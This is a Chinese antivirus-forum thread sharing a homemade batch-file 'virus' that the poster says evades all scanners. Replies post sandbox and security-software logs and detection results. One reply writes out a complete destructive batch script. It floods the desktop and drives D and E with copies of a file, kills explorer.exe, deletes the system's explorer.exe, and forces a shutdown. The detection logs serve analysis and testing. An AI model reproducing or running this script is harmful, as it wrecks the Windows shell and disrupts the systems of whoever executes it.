查看: 4465|回复: 12
收起左侧

[病毒样本] 又一个自制bat病毒

[复制链接]
我是大神才怪
发表于 2019-1-25 08:31:43 | 显示全部楼层 |阅读模式
     这次比上次更坑爹,而且还是一如既往的完全免杀(不信你们自己去多引擎测)
1.不要实机运行
2.请管理员运行
3.请解压到c盘virus文件夹


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
具具
发表于 2019-1-25 08:52:01 | 显示全部楼层
火绒卡巴免杀
我是大神才怪
 楼主| 发表于 2019-1-25 08:53:17 | 显示全部楼层
所有都免杀
左手
发表于 2019-1-25 09:19:34 | 显示全部楼层
2019/1/25/星期五 09:18:21    创建新进程 风险提示:未知    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\taskkill.exe
命令行: taskkill  /f /im explorer.exe
规则: [应用程序]?* -> [子应用程序]?*:\windows\system32\taskkill.exe

2019/1/25/星期五 09:18:29    删除文件 风险提示:木马 (2)    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\Windows\explorer.exe
规则: [应用程序]?* -> [文件组]《坚固》xp系统exe
安全守护者
头像被屏蔽
发表于 2019-1-25 09:20:39 | 显示全部楼层

给你改了一下:
  1. @echo off
  2. for /l %%i in (1, 1, 5000) do copy xxx.txt  %userprofile%\desktop\
  3. for /l %%i in (1, 1, 5000) do copy xxx.txt  d:\
  4. for /l %%i in (1, 1, 5000) do copy xxx.txt  e:\
  5. taskkill /f /im explorer.exe
  6. del /s /q %SystemRoot%\explorer.exe
  7. shutdown -s -t 1
复制代码
huang1111
发表于 2019-1-25 09:45:27 | 显示全部楼层
系统批处理文件而已,能算病毒?!
安全守护者
头像被屏蔽
发表于 2019-1-25 09:47:16 | 显示全部楼层
360隔离沙箱运行,占用急剧上升。
未见明显异常。随后系统关机。


  1. 操作者:C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
  2. 命令行:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
  3. 触犯规则:关键保护
  4. 操作类型:执行
  5. 操作文件:C:\Windows\system32\taskkill.exe
  6. 用户操作:已阻止
  7. 操作者:C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
  8. 命令行:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
  9. 触犯规则:关键保护
  10. 操作类型:删除
  11. 操作文件:C:\360SANDBOX\SHADOW\Windows\SysWOW64\explorer.exe
  12. 用户操作:已允许


  13. 操作者:C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
  14. 命令行:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
  15. 触犯规则:关键保护
  16. 操作类型:删除
  17. 操作文件:C:\360SANDBOX\SHADOW\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_10.0.18290.1000_none_e4b5d9e306f4c069\explorer.exe
  18. 用户操作:已允许


  19. 操作者:C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
  20. 命令行:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
  21. 触犯规则:关键保护
  22. 操作类型:删除
  23. 操作文件:C:\360SANDBOX\SHADOW\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.18290.1000_none_ef0a84353b558264\explorer.exe
  24. 用户操作:已允许
复制代码





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wenshui1013
发表于 2019-1-25 11:11:21 | 显示全部楼层
这种杀软扫描不杀也正常吧,没意义啊
WHALE-FALL
发表于 2019-1-25 12:23:24 | 显示全部楼层
智量
2019-1-25 12:20     D:\下载\virus\kill.bat                           RiskTool.Generic

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
发表于 2019-1-25 14:47:53 | 显示全部楼层

智量已入库,火绒miss 。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-27 11:27 , Processed in 0.122629 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表